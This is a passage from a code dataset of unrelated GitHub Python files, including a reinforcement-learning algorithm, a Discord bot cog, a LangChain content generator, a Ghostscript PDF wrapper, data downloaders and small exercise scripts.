the reservoir buffer.\n\n Transitions are in the form (time_step, agent_output.probs, legal_mask).\n\n Args:\n time_step: an instance of rl_environment.TimeStep.\n agent_output: an instance of rl_agent.StepOutput.\n \"\"\"\n legal_actions = time_step.observations['legal_actions'][self._player_id]\n legal_actions_mask = np.zeros(self._num_actions)\n legal_actions_mask[legal_actions] = 1.0\n transition = Transition(\n info_state=(time_step.observations['info_state'][self._player_id][:]),\n action_probs=agent_output.probs,\n legal_actions_mask=legal_actions_mask)\n self._reservoir_buffer.add(transition)\n\n def _loss_avg(self, param_avg, info_states, action_probs):\n avg_logit = self.avg_network.apply(param_avg, info_states)\n loss_value = -jnp.sum(\n action_probs * jax.nn.log_softmax(avg_logit)) / avg_logit.shape[0]\n return loss_value\n\n def learn(self) -> Optional[float]:\n \"\"\"Compute the loss on sampled transitions and perform a avg-network update.\n\n If there are not enough elements in the buffer, no loss is computed and\n `None` is returned instead.\n\n Returns:\n The average loss obtained on this batch of transitions or `None`.\n \"\"\"\n if (len(self._reservoir_buffer) < self._batch_size or\n len(self._reservoir_buffer) < self._min_buffer_size_to_learn):\n return None\n\n transitions = self._reservoir_buffer.sample(self._batch_size)\n info_states = np.asarray([t.info_state for t in transitions])\n action_probs = np.asarray([t.action_probs for t in transitions])\n\n self._params_avg_network, self._opt_state, loss_val_avg = self._jit_update(\n self._params_avg_network, self._opt_state, info_states, action_probs)\n self._last_loss_value = float(loss_val_avg)\n return loss_val_avg\n\n\nclass AverageNetworkFictitiousPlay(object):\n \"\"\"Deep Average-network Fictitious Play.\n\n See the file description for more information.\n \"\"\"\n\n def __init__(self,\n game: pyspiel.Game,\n envs: Sequence[rl_environment.Environment],\n br_rl_agents: Sequence[rl_agent.AbstractAgent],\n num_episodes_per_iteration: int,\n num_training_steps_per_iteration: int,\n eval_every: int = 200,\n logging_fn: Optional[Callable[[int, int, Dict[str, Any]],\n None]] = None,\n **kwargs):\n \"\"\"Initializes the greedy policy.\n\n Args:\n game: The game to analyze.\n envs: RL environment for each player.\n br_rl_agents: Best response, e.g. DQN, agents for each player.\n num_episodes_per_iteration: Number of episodes to collect samples that are\n added to the reservoir buffer.\n num_training_steps_per_iteration: Number of steps to train the average\n policy in each iteration.\n eval_every: Number of training steps between two evaluations.\n logging_fn: Callable for logging the metrics. The arguments will be the\n current iteration, episode and a dictionary of metrics to log.\n **kwargs: kwargs passed to the AveragePolicy() constructor.\n \"\"\"\n self._game = game\n self._envs = envs\n self._num_episodes_per_iteration = num_episodes_per_iteration\n self._num_training_steps_per_iteration = num_training_steps_per_iteration\n self._eval_every = eval_every\n self._logging_fn = logging_fn\n\n self._num_players = game.num_players()\n self._fp_iteration = 0\n\n env = self._envs[0]\n info_state_size = env.observation_spec()['info_state'][0]\n num_actions = env.action_spec()['num_actions']\n\n self._avg_rl_agents = [\n AveragePolicy(p, br_rl_agents[p], info_state_size, num_actions,\n **kwargs) for p in range(self._num_players)\n ]\n self._policy = rl_agent_policy.JointRLAgentPolicy(\n self._game,\n {idx: agent for idx, agent in enumerate(self._avg_rl_agents)},\n use_observation=env.use_observation)\n self._update_distribution()\n\n def _update_distribution(self):\n \"\"\"Calculates the current distribution and updates the environments.\"\"\"\n self._distribution = distribution.DistributionPolicy(\n self._game, self._policy)\n for env in self._envs:\n env.update_mfg_distribution(self._distribution)\n\n @property\n def policy(self) -> rl_agent_policy.JointRLAgentPolicy:\n return self._policy\n\n def iteration(self):\n \"\"\"An average-network fictitious play step.\"\"\"\n # Generate samples using latest best-response and add them to the reservoir\n # buffer. Note that the algorithm is agnostic to the best-response policies\n # as we only use them to collect new samples. They can be approximate (e.g.\n # backed by a deep algorithm) or exact.\n training.run_episodes(\n self._envs,\n self._avg_rl_agents,\n num_episodes=self._num_episodes_per_iteration,\n is_evaluation=False)\n\n # Train the average policy.\n for step in range(self._num_training_steps_per_iteration):\n for avg_rl_agent in self._avg_rl_agents:\n avg_rl_agent.learn()\n\n if self._logging_fn and (step + 1) % self._eval_every == 0:\n self._logging_fn(\n self._fp_iteration, step, {\n f'avg_agent{i}/loss': float(agent.loss)\n for i, agent in enumerate(self._avg_rl_agents)\n })\n\n # Update the distribution.\n self._update_distribution()\n self._fp_iteration += 1\n","repo_name":"deepmind/open_spiel","sub_path":"open_spiel/python/mfg/algorithms/average_network_fictitious_play.py","file_name":"average_network_fictitious_play.py","file_ext":"py","file_size_in_byte":11765,"program_lang":"python","lang":"en","doc_type":"code","stars":3700,"dataset":"github-code","pt":"37"} +{"seq_id":"16701794032","text":"import discord\nfrom discord.ext import commands\n\narrow = \"\"\nkwee = \"<:kannawee:877036162122924072>\"\nkdance = \"\"\nkbored = \"<:kanna_bored:877036162827583538>\"\nksmug = \"<:kanna_smug:877038777896427560>\"\nheart = \"\"\n\nclass Server(commands.Cog):\n def __init__(self, client):\n self.client = client\n self.kana_id = 857835279259664403\n\n @commands.command()\n @commands.is_owner()\n async def sabout(self, ctx):\n kana = self.client.get_user(self.kana_id)\n about_file = discord.File(\"./images/about_server.png\")\n await ctx.send(file = about_file)\n emb = discord.Embed(title=f\"{kdance} ABOUT SERVER {kdance}\",description = f\"{arrow} **DRAGON LOLI'S HOME** is the official Server of the bot **Kanna Chan**. It's a friendly community meant for having fun, chilling and spending time with others.\\n{arrow} This server has cute emotes and a lot of fun events are about to be done here! So, stay tuned!\", color=0xfc74c6)\n emb.add_field(\n name=f\"{kwee} __ROLES__\",\n value=f\"{arrow} <@&876800883441156138> The highest role supposed to be only for Kanna Chan.\\n{arrow} <@&876817811396263946> Admins of the Server and have the highest power and authority after owner.\\n{arrow} <@&876818242058997791> Moderators of the server meant to moderate the chat and maintain a positive environment in community.\\n{arrow} <@&876801038420701196> Developer(s) of Kanna Chan have this role.\\n{arrow} <@&876804164661944340> All other users who join this server get this role by default. They have image and embed perms by deault.\\n{arrow} **PS: APART FROM THESE SELF-ROLES ARE ALSO AVAIALBLE FOR MEMBERS.**\",\n inline=False\n )\n emb.add_field(\n name=f\"{ksmug} __CHANNELS__\",\n value=f\"{arrow} <#877030933847490691> Read the rules here.\\n{arrow} <#877031867440832574> Channel for grabbing self-roles.\\n{arrow} <#876798564704084011> The general chat for the server.\\n{arrow} <#876798809819189249> Bot Commands should be executed here.\\n{arrow} <#876798696078065694> You can give suggestions for improving Kanna Chan here.\\n{arrow} <#876798720254029864> You can report BUGS here if you find any in Kanna Chan.\\n{arrow} <#876798750876651530> For any other support or query use this channel.\\n{arrow} **P.S: YOU CAN PING ANY STAFF MEMBER OR DEVELOPER WHILE REPORTING BUG OR IN CASE OF ANY QUERY.**\",\n inline=False\n )\n emb.set_footer(\n text=\"Kanna Chan\",\n icon_url=kana.avatar_url\n )\n await ctx.send(embed=emb)\n\n @commands.command()\n @commands.is_owner()\n async def rule(self, ctx):\n kana = self.client.get_user(self.kana_id)\n rule_file = discord.File(\"./images/rules.png\")\n await ctx.send(file=rule_file)\n emb = discord.Embed(title=f\"{kbored} RULES {kbored}\", color=0xfc74c6)\n emb.add_field(\n name=f\"{heart} **Be respectful**\",\n value=f\"You must respect all users, regardless of your liking towards them. Treat others the way you want to be treated.\",\n inline=False\n )\n emb.add_field(\n name=f\"{heart} **No Inappropriate Language**\",\n value=f\"{arrow} The use of profanity should be kept to a minimum. However, any derogatory language towards any user is prohibited.\",\n inline=False\n )\n emb.add_field(\n name=f\"{heart} **No spamming**\",\n value=f\"{arrow} Don't send a lot of small messages right after each other. Do not disrupt chat by spamming.\",\n inline=False\n )\n emb.add_field(\n name=f\"{heart} **No pornographic/adult/other NSFW material**\",\n value=f\"{arrow} This is a community server and not meant to share this kind of material.\",\n inline=False\n )\n emb.add_field(\n name=f\"{heart} **No advertisements**\",\n value=f\"{arrow} We do not tolerate any kind of advertisements, whether it be for other communities or streams. You can post your content in the media channel if it is relevant and provides actual value (Video/Art)\",\n inline=False\n )\n emb.add_field(\n name=f\"{heart} **No offensive names and profile pictures**\",\n value=f\"{arrow} You will be asked to change your name or picture if the staff deems them inappropriate.\",\n inline=False\n )\n emb.add_field(\n name=f\"{heart} **Server Raiding**\",\n value=f\"{arrow} Raiding or mentions of raiding are not allowed.\",\n inline=False\n )\n emb.add_field(\n name=f\"{heart} **Direct & Indirect Threats**\",\n value=f\"{arrow} Threats to other users of DDoS, Death, DoX, abuse, and other malicious threats are absolutely prohibited and disallowed.\",\n inline=False\n )\n emb.add_field(\n name=f\"{heart} **Follow the Discord Community Guidelines**\",\n value=f\"{arrow} You can find them here: https://discordapp.com/guidelines\",\n inline=False\n )\n emb.add_field(\n name=f\"{heart} **VOICE CHANNELS**\",\n value=f\"{arrow} Do not join voice chat channels without permission of the people already in there.\",\n inline=False\n )\n emb.add_field(\n name=f\"{heart} **DECISIONS AND ISSUES**\",\n value = f\"{arrow} ***The Admins and Mods will Mute/Kick/Ban per discretion. If you feel mistreated DM an Admin and we will resolve the issue.***\",\n inline=False\n )\n emb.add_field(\n name=f\"{heart} **CHANGES**\",\n value = f\"{arrow} ***Your presence in this server implies accepting these rules, including all further changes. These changes might be done at any time without notice, it is your responsibility to check for them.***\",\n inline=False\n )\n emb.set_footer(\n text=\"Kanna Chan\",\n icon_url=kana.avatar_url\n )\n await ctx.send(embed=emb)\n\n @commands.Cog.listener()\n async def on_member_join(self, member):\n if member.guild.id == 876798564704084008:\n if member.bot:\n return\n else:\n member_role = member.guild.get_role(876804164661944340)\n await member.add_roles(member_role)\n desc = f\"{member.name} Thanks for joining Kanna's Server. The server is currently under construction, Thanks for being an **early supporter**!! If you need any kind of help or support just ping any staff member or DM `aSHish#1198`. Have a nice stay in the server :)\"\n await member.send(desc)\n else:\n return\n\ndef setup(client):\n client.add_cog(Server(client))\n print(\">> Server Utility loaded\")","repo_name":"asrvd/Kanna-Chan","sub_path":"cogs/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6897,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"25794451164","text":"# Bring in deps\r\nimport os \r\nfrom apikey import apikey\r\nimport streamlit as st \r\nfrom langchain.llms import OpenAI\r\nfrom langchain.prompts import PromptTemplate\r\nfrom langchain.chains import LLMChain, SequentialChain \r\nfrom langchain.memory import ConversationBufferMemory\r\nfrom langchain.utilities import WikipediaAPIWrapper \r\n\r\nos.environ['OPENAI_API_KEY'] = apikey\r\n\r\n# App framework\r\nst.title('🔗 Content Creator')\r\nprompt = st.text_input('Plug in the Keyword for the content you want to create') \r\n\r\n# Get a response\r\nimport openai\r\n\r\ntitle_template = PromptTemplate(\r\n input_variables = ['topic'], \r\n template='write me a content title about {topic} related to VOIP consisting of atleast 1 positive, 1 power and must be of 60 characters'\r\n)\r\n\r\noutline_template= PromptTemplate(\r\n input_variables=['title'],\r\n template='AZ Wholesale {title}” Based ON provided Information, Please Create an outline for the blog, the blog will be 2000 words. need to write a Title, with 60 characters and use power and positive word with a number, Meta should be a maximum of 160 characters, and the content should have a detailed outline. include H1,h2,h3,h4'\r\n)\r\n\r\nscript_template = PromptTemplate(\r\n input_variables= ['title','outline'], \r\n template='I like to start creating an article but want to start with the First section. I only. please write only the I section first and one by one we will write the rest the sections once I send submit. we will write the next one'\r\n)\r\n\r\n# Memory \r\ntitle_memory = ConversationBufferMemory(input_key='topic', memory_key='chat_history')\r\nscript_memory = ConversationBufferMemory(input_key='title', memory_key='chat_history')\r\noutline_memory = ConversationBufferMemory(input_key='topic',memory_key='chat_history')\r\n# Llms\r\nllm = OpenAI(temperature=0.9) \r\ntitle_chain = LLMChain(llm=llm, prompt=title_template, verbose=True, output_key='title', memory=title_memory)\r\nscript_chain = LLMChain(llm=llm, prompt=script_template, verbose=True, output_key='script', memory=script_memory)\r\nwiki = WikipediaAPIWrapper()\r\noutline_chain=LLMChain(llm=llm,prompt=outline_template, verbose=True, output_key='topic', memory=outline_memory)\r\n\r\n# Show stuff to the screen if there's a prompt\r\nif prompt: \r\n title = title_chain.run(prompt)\r\n outline= outline_chain.run(prompt)\r\n wiki_research = wiki.run(prompt) \r\n script = script_chain.run(title=title, wikipedia_research=wiki_research) \r\n\r\n st.write(title) \r\n st.write(script)\r\n st.write(outline)\r\n\r\n with st.expander('Title History'): \r\n st.info(title_memory.buffer)\r\n\r\n with st.expander('Script History'): \r\n st.info(script_memory.buffer)\r\n\r\n with st.expander('Outline Points'):\r\n st.info(outline_memory.buffer)","repo_name":"mycountrymobile/content_creator","sub_path":"content/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26374985513","text":"from django.conf.urls import url\nfrom registration import views\n\nurlpatterns = [\n url(r'^register/$',views.register_user,name='register_user'),\n url(r'^logout_user/$', views.logout_user, name='logout_user'),\n url(r'^login_user/$',views.login_user,name='login_user'),\n url(r'^profile/$',views.profile,name='profile'),\n url(r'^createprofile/$',views.createprofile,name='createprofile'),\n]\n","repo_name":"Yeasincse/Standard-User-Registration-Login-Logout-Tutorial","sub_path":"Servicenen/registration/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"10107151339","text":"'''\n Implementing Nearest Neighbor Heuristic to solve Traveling Salesman problems\n'''\ndef tspNearestNeighborHeuristic(cities, distance):\n visited = []\n minimum_distance_traveled = []\n\n neighbor = 'A'\n start_node_index = cities.index(neighbor)\n\n no_nodes = len(cities)\n noN = 0\n while noN < no_nodes and neighbor not in visited:\n\n visited.append(neighbor)\n neighbor_index = cities.index(neighbor)\n noNeigjbour = 0\n MIN = 0\n\n while noNeigjbour < len(distance[neighbor_index]):\n\n if cities[noNeigjbour] not in visited: #look for unvisitied cities.\n if MIN == 0:\n MIN = distance[neighbor_index][noNeigjbour]\n neighbor = cities[noNeigjbour]\n else:\n min_distance = min(distance[neighbor_index][noNeigjbour], MIN)\n if distance[neighbor_index][noNeigjbour] < MIN:\n MIN = min_distance\n neighbor = cities[noNeigjbour]\n noNeigjbour += 1\n minimum_distance_traveled.append(MIN)\n noN += 1\n last_node_index = cities.index(visited[-1])\n minimum_distance_traveled[-1] = distance[last_node_index][start_node_index]\n print('Shortest route : ', \" -> \".join(visited))\n for _i in range(len(visited)):\n print(\"City \" + visited[_i] + \"'s Nearest Neighbor's Distance is \", minimum_distance_traveled[_i])\n print(\"total traveled distance: \", sum(minimum_distance_traveled))\n\n\n\ncities = ['A', 'B', 'C', 'D', 'E']\ndistance = [[0, 60, 217, 164, 69],\n [60, 0, 290, 201, 79],\n [217, 290, 0, 113, 303],\n [164, 201, 113, 0, 196],\n [69, 79, 303, 196, 0]]\n\ntspNearestNeighborHeuristic(cities, distance)\n","repo_name":"sindhusweety/Linear-Programming-Problem-Solver","sub_path":"tspNearestNeighborMethod.py","file_name":"tspNearestNeighborMethod.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11086149933","text":"import numpy as np\n# import os; os.chdir('C:/Users/ingulbull/Desktop/2019-1/Repro_study_2019_1')\nimport torch\nimport torch.nn as nn\nfrom preprocess import *\nfrom loader import train_loader, val_loader\nfrom model import Highway, CharAwareLM\nfrom config import src\n\n\n## Hyper Parameters\nlearning_rate = 1.0\nnum_epochs = 25\n\nclass Trainer():\n def __init__(self, src, learning_rate, num_epochs, train_loader, val_loader, train_char_idx, target_train, val_char_idx, target_val):\n self.char_vocab = src['char_vocab']\n self.word_vocab = src['word_vocab']\n self.max_len = src['maxLen']\n self.time_steps = src['time_steps']\n self.embed_size_char = src['embed_size_char']\n self.hidden_size = src['hidden_size']\n self.num_layer = src['num_layer']\n self.lr = learning_rate\n self.num_epochs = num_epochs\n self.batch_size = src['batch_size']\n self.model = CharAwareLM(src)\n # self.model.init_weight()\n self.train_loader = train_loader\n self.val_loader = val_loader\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n self.train = train_char_idx\n self.target_train = target_train\n self.val = val_char_idx\n self.target_val = target_val\n\n def _train(self):\n best_ppl = 10000\n model = self.model\n device = self.device\n model = model.to(device)\n\n print('Current Mode is', device)\n\n criterion = nn.CrossEntropyLoss()\n # optimizer = torch.optim.SGD(filter(\n # lambda p: p.requires_grad, model.parameters()),\n # lr = self.lr\n # )\n optimizer = torch.optim.SGD(filter(\n lambda p: p.requires_grad, model.parameters()),\n lr = self.lr\n )\n\n for epoch in range(self.num_epochs):\n h_with_c = [torch.zeros(self.num_layer, self.batch_size, self.hidden_size).to(device)] * 2\n model.train(True)\n\n for i in range(0, self.train.shape[0] - self.batch_size, self.batch_size):\n # for i, (data_char, target) in enumerate(self.train_loader):\n # data_char = data_char.to(device)\n # target = target.to(device)\n data_char = self.train[i : i + self.batch_size, :, :].to(device)\n target = self.target_train[(i+1) : (i+1) + self.batch_size, :].to(device)\n\n h_with_c = [state.detach() for state in h_with_c]\n out, h_with_c = model(data_char, h_with_c)\n\n loss = criterion(out, target.view(-1))\n loss.backward()\n\n nn.utils.clip_grad_norm_(model.parameters(), 5)\n optimizer.step()\n\n model.zero_grad()\n\n step = i+1\n if step % 100 == 0:\n print('Epoch [%d/%d], Step [%d/%d], Loss: %.4f, Perplexity: %5.2f' %\n (epoch+1, self.num_epochs, step // self.time_steps, len(self.train_loader) // self.time_steps,\n loss.item(), np.exp(loss.item())))\n\n model.eval()\n val_loss = self._validate(model, h_with_c, criterion)\n val_ppl = np.exp(val_loss)\n\n if best_ppl - val_ppl < 1:\n if self.lr > 0.03:\n self.lr = self.lr * 0.5\n print('Adjusted learning_rate: %.5f' % self.lr)\n optimizer = torch.optim.SGD(filter(\n lambda p: p.requires_grad, model.parameters()),\n lr = self.lr\n )\n else:\n pass\n\n if val_ppl < best_ppl:\n print('Current best Val Loss: ', val_loss)\n best_ppl = val_ppl\n torch.save(model.state_dict(), 'model' + str(val_ppl) + '.pkl')\n\n\n def _validate(self, model, hidden, criterion):\n device = self.device\n\n val_loss = 0\n step = 0\n for i in range(0, val.shape[0] - self.batch_size, self.batch_size):\n # for i, (data_char, target) in enumerate(self.val_loader):\n # data_char = data_char.to(device)\n # target = target.to(device)\n data_char = self.val[i : i + self.batch_size, :, :].to(device)\n target = self.target_val[(i+1) : (i+1) + self.batch_size, :].to(device)\n\n out_val, _ = model(data_char, hidden)\n loss = criterion(out_val, target.view(-1))\n val_loss += loss.item()\n step += 1\n\n model.zero_grad()\n\n print('Val Loss: %.4f, Perplexity: %5.2f' % (val_loss / step, np.exp(val_loss / step)))\n\n return val_loss / step\n # def _validate(self, valid_loader):\n #\n\ntrainer = Trainer(src, learning_rate, num_epochs, train_loader, val_loader, train_char_idx, target_train, val_char_idx, target_val)\ntrainer._train()\n","repo_name":"EmberLee/Character-aware_Language_Model_by_Pytorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33570407335","text":"from setuptools import setup, find_packages\nimport os\n\nPATH = os.path.dirname(os.path.abspath(__file__))\ntemplates_dir = os.path.join(PATH, \".\")\ntemplates_files = [os.path.join(templates_dir, file) for file in os.listdir(templates_dir)]\n\nsetup(name='PyVoodoo',\n version='0.0.1',\n description='Small library to generate code and bytecode dynamically',\n author='Ernesto Bossi',\n author_email='bossi.ernestog@gmail.com',\n url='https://github.com/bossiernesto/pyVoodoo',\n license='GPL v3',\n keywords='',\n packages=find_packages(exclude=[\"test\"]),\n data_files=[\n (templates_dir, templates_files)\n ],\n install_requires=[],\n package_dir={'PyVoodoo': 'pyVoodoo'},\n classifiers=[\"Development Status :: 1 - Planning\",\n \"Topic :: Utilities\",\n \"License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)\"]\n)\n","repo_name":"bossiernesto/pyVoodoo","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11072083922","text":"def convolution(spectrum):\n \n \"\"\"Input: A collection of integers Spectrum.\n Output: The list of elements in the convolution of Spectrum. If an element has\n multiplicity k, it should appear exactly k times; you may return the elements in any order.\"\"\"\n \n spectrum = sorted(spectrum)\n return [i-j for i in spectrum for j in spectrum if i-j > 0] \n\n#Read input data\nf = open('dataset_104_4.txt')\nspectrum = map(int, f.read().strip().split())\n\n# Call function\nans = convolution(spectrum)\n\n#Output in right format\nprint (' '.join(str(i) for i in ans))\n","repo_name":"mars1198/bioinformatics","sub_path":"SpectralConvolutionProblem.py","file_name":"SpectralConvolutionProblem.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70576248427","text":"import sys\nfrom _collections import deque\nsys.stdin=open('17070_파이프옮기기.txt')\n\ndef issafe(node, data):\n if (0<=node[0]\\n庆典筹备计划唔,你可能需要这个,大概···', type='Xml')\n return MessageChain.create([app])\n else:\n if hello=='签到成功':\n return MessageChain.create([Plain(\"* 签到仅在4-10点开放\")])\n else:\n if 0 None:\n self.process = process\n super().__init__(message)\n\n\ndef _validate_device(device: str) -> str:\n if device not in [\"pnggray\", \"png16m\", \"png256\"]:\n raise ValueError(\"Invalid device\")\n\n return device\n\n\ndef rasterize_page(\n fp: Union[PathLike, str],\n output_path: str,\n idx: int,\n *,\n dpi: int = 200,\n device=\"pnggray\",\n):\n device = _validate_device(device)\n args = [\n GS,\n \"-q\",\n \"-dSAFER\",\n \"-dBATCH\",\n \"-dNOPAUSE\",\n \"-sDEVICE=png16m\",\n \"-dTextAlphaBits=4\",\n \"-dGraphicsAlphaBits=4\",\n f\"-sDEVICE={device}\",\n f\"-dFirstPage={idx}\",\n f\"-dLastPage={idx}\",\n f\"-r{dpi}\",\n f\"-sOutputFile={output_path}\",\n \"-f\",\n str(fp),\n ]\n\n result = run(args, stdout=PIPE, stderr=PIPE, check=False)\n\n if result.returncode != 0:\n raise GhostscriptError(\"Ghostscript failed to rasterize the document: \", result)\n\n return result\n\n\ndef rasterize_page_to_bytes(fp: Union[PathLike, str], idx: int, *, dpi: int = 200, device=\"pnggray\") -> bytes:\n if isinstance(fp, bytes):\n with tempfile.NamedTemporaryFile(suffix=\".pdf\") as f:\n f.write(fp)\n f.flush()\n result = rasterize_page(f.file.name, \"%stdout\", idx, dpi=dpi, device=device)\n else:\n result = rasterize_page(fp, \"%stdout\", idx, dpi=dpi, device=device)\n\n return result.stdout\n\n\ndef rasterize_page_to_path(\n fp: Union[PathLike, str],\n idx: int,\n output_path: PathLike,\n *,\n dpi: int = 200,\n device=\"pnggray\",\n) -> Path:\n if isinstance(fp, bytes):\n with tempfile.NamedTemporaryFile(suffix=\".pdf\") as f:\n f.write(fp)\n f.flush()\n rasterize_page(f.file.name, str(output_path), idx, dpi=dpi, device=device)\n else:\n rasterize_page(fp, str(output_path), idx, dpi=dpi, device=device)\n\n return Path(output_path)\n\n\ndef compress_pdf(\n fp: Union[PathLike, str], # Ghostscript insists on a file instead of bytes\n output_path: str,\n *,\n compression: Literal[\"jpeg\", \"lossless\"] = \"jpeg\",\n):\n compression_args = []\n if compression == \"jpeg\":\n compression_args = [\n \"-dAutoFilterColorImages=false\",\n \"-dColorImageFilter=/DCTEncode\",\n \"-dAutoFilterGrayImages=false\",\n \"-dGrayImageFilter=/DCTEncode\",\n ]\n elif compression == \"lossless\":\n compression_args = [\n \"-dAutoFilterColorImages=false\",\n \"-dColorImageFilter=/FlateEncode\",\n \"-dAutoFilterGrayImages=false\",\n \"-dGrayImageFilter=/FlateEncode\",\n ]\n else:\n compression_args = [\n \"-dAutoFilterColorImages=true\",\n \"-dAutoFilterGrayImages=true\",\n ]\n\n args_gs = (\n [\n GS,\n \"-q\",\n \"-dBATCH\",\n \"-dNOPAUSE\",\n \"-dSAFER\",\n \"-dCompatibilityLevel=1.5\",\n \"-sDEVICE=pdfwrite\",\n \"-dAutoRotatePages=/None\",\n \"-sColorConversionStrategy=LeaveColorUnchanged\",\n ]\n + compression_args\n + [\n \"-dJPEGQ=95\",\n \"-dPDFA=2\",\n \"-dPDFACompatibilityPolicy=1\",\n \"-sOutputFile=\" + output_path,\n str(fp),\n ]\n )\n\n result = run(args_gs, stdout=PIPE, stderr=PIPE, check=False)\n\n if result.returncode != 0:\n raise GhostscriptError(\"Ghostscript failed to compress the document\", result)\n\n return result\n\n\ndef compress_pdf_to_bytes(fp: Union[PathLike, str], *, compression: Literal[\"jpeg\", \"lossless\"] = \"jpeg\") -> bytes:\n result = compress_pdf(fp, output_path=\"%stdout\", compression=compression)\n\n return result.stdout\n\n\ndef compress_pdf_to_path(\n fp: Union[PathLike, str],\n output_path: PathLike,\n *,\n compression: Literal[\"jpeg\", \"lossless\"] = \"jpeg\",\n) -> Path:\n compress_pdf(fp, output_path=str(output_path), compression=compression)\n\n return Path(output_path)\n","repo_name":"Page-Leaf/Docprompt","sub_path":"docprompt/_exec/ghostscript.py","file_name":"ghostscript.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3910948783","text":"from shutil import rmtree\n\nimport requests\nimport wbdata\nfrom git import Repo\nfrom time import sleep\n\ndef delete_directory(path):\n \"\"\"\n Remove directory.\n \"\"\"\n\n try:\n rmtree(path)\n except FileNotFoundError:\n pass \n\ndef download_covid():\n \"\"\"\n Download COVID-19 case data.\n \"\"\"\n\n url = 'https://github.com/CSSEGISandData/COVID-19'\n path = './data/COVID-19'\n\n print('Downloading covid data.')\n\n delete_directory(path=path)\n\n # Clone repo with covid data\n Repo.clone_from(url, to_path=path)\n\ndef download_countries():\n \"\"\"\n Download countries csv.\n \"\"\"\n \n url = 'https://datahub.io/JohnSnowLabs/country-and-continent-codes-list/r/country-and-continent-codes-list-csv.csv'\n path = './data/datahub'\n\n print('Downloading country data.')\n\n delete_directory(path=path)\n\n req = requests.get( url=url)\n content = req.content\n with open(f'{path}/countries.csv', 'wb') as csv:\n csv.write(content)\n\ndef download_world_bank():\n \"\"\"\n Download data from the World Bank\n \"\"\"\n\n path = './data/world_bank'\n\n delete_directory(path=path)\n\n indicators = [{'NY.GDP.PCAP.PP.CD': f'GDP per capita, PPP (current international $)'},\n {'SP.POP.TOTL': f'Population, total'},\n {'SP.URB.TOTL.IN.ZS': f'Urban population (% of total population)'},\n {'EN.POP.SLUM.UR.ZS': f'Urban population (% of total population)'},\n {'SP.RUR.TOTL.ZS': f'Urban population (% of total population)'},\n {'SP.DYN.LE00.IN': f'Life expectancy at birth, total (years)'},\n {'SH.XPD.CHEX.GD.ZS': f'Current health expenditure (% of GDP)'}]\n\n for indicator in indicators:\n\n file_name = list(indicator.keys())[0]\n full_path = f'{path}/{file_name}.csv'\n\n print(f'Downloading {indicator}.') \n\n try:\n df = wbdata.get_dataframe(indicator)\n df.to_csv(full_path)\n sleep(2)\n except Exception:\n print(f'Download failed for {indicator}')\n\nif __name__ == '__main__':\n \n download_covid() \n download_countries()\n download_world_bank()","repo_name":"shsarv/Data-Analytics-Projects-in-python","sub_path":"COVID19/data/download_data.py","file_name":"download_data.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"37"} +{"seq_id":"43161930516","text":"\n\nwith open(\"input.txt\") as file:\n lines = file.read().split(\"\\n\")\n\nbuses = [num for num in lines[1].split(\",\")]\n\noffsets = {}\nfor i,bus in enumerate(buses):\n if bus != \"x\":\n offsets[int(bus)] = i\n\n# Brute-force solution\n# Cannot solve puzzle input, but does solve all test cases\nt = 0\nwhile True:\n valid = True\n for bus,offset in offsets.items():\n if (t + offset) % bus != 0:\n valid = False\n break\n if valid:\n break\n t += 1\nprint(t)\n\n","repo_name":"JoshW-7/AdventOfCode","sub_path":"2020/Day 13/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"86510291105","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n#import matplotlib\r\nimport seaborn as sns\r\n\r\nplt.rc(\"font\",family='Arial Unicode MS')\r\n\r\n#读取train的数据\r\ntrain_data=pd.read_csv(r\"E:\\titanic\\train.csv\",header=[0])\r\nprint(train_data.head())\r\n\r\n#读取test的数据\r\ntest_data=pd.read_csv(r\"E:\\titanic\\test.csv\",header=[0])\r\nprint(test_data.head())\r\n\r\n#查看train和test的基本信息\r\nprint(train_data.info())\r\nprint(test_data.info())\r\n\r\n#查看train和test数据列不同值的数量\r\nprint(train_data.nunique())\r\nprint(test_data.nunique())\r\n\r\n#删除不需要的列Ticket\r\ntnd=train_data.drop(['Ticket'],axis=1,inplace=True)\r\nprint(tnd)\r\ntd=test_data.drop(['Ticket'],axis=1,inplace=True)\r\nprint(td)\r\n\r\n#统计生存者的数量\r\npd1=pd.DataFrame(train_data.Survived.value_counts(normalize=True)*100)\r\nprint(pd1)\r\ntrain_data.Survived.value_counts().plot(kind='bar',xlabel='生存情况',ylabel='人数',width=0.4,color='g',alpha=0.6)\r\n\r\n#统计男女年龄数\r\npd2=pd.DataFrame(train_data.Sex.value_counts())\r\nprint(pd2)\r\n\r\n#统计生存概率\r\npd0=pd.DataFrame(train_data.Survived.value_counts(normalize=True)*100)\r\nprint(pd0)\r\n\r\n#统计男女生存概率\r\npd3=pd.DataFrame(train_data.groupby(['Sex'])['Survived'].value_counts(normalize=True)*10